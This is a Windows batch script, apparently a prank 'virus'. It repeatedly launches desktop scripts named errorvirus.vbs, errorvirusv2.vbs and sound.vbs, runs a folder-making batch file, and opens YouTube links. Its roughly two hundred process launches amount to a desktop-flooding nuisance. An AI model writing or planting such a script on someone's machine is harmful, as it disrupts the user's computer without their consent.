@echo off
start %USERPROFILE%\desktop\Desktop\Makefolders.bat
start %USERPROFILE%\desktop\Desktop\errorvirus.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start %USERPROFILE%\desktop\Desktop\sound.vbs
start https://www.youtube.com/watch?v=R6NMvMLYjlc
start https://i.ebayimg.com/images/g/naEAAMXQAMlRYTJE/s-l300.jpg
@echo off
echo waiting 3 seconds to fully start 
timeout 3 >nul
goto start1

:start1
start %USERPROFILE%\desktop\Desktop\errorvirus.vbs
goto start2

:start2
start %USERPROFILE%\desktop\Desktop\Makefolders.bat
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
timeout 2 >nul 
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
start %USERPROFILE%\desktop\Desktop\errorvirusv2.vbs
timeout 2 >nul
echo starting sherk.exe
timeout 2 .nul
start https://www.youtube.com/watch?v=nX5hbgFBvww
start %USERPROFILE%\desktop\Desktop\sherkstart.vbs
start %USERPROFILE%\desktop\Desktop\sherkstartv2.vbs
start https://www.youtube.com/watch?v=Z7ATOBjP2Xg
start %USERPROFILE%\desktop\Desktop\fullyet.vbs
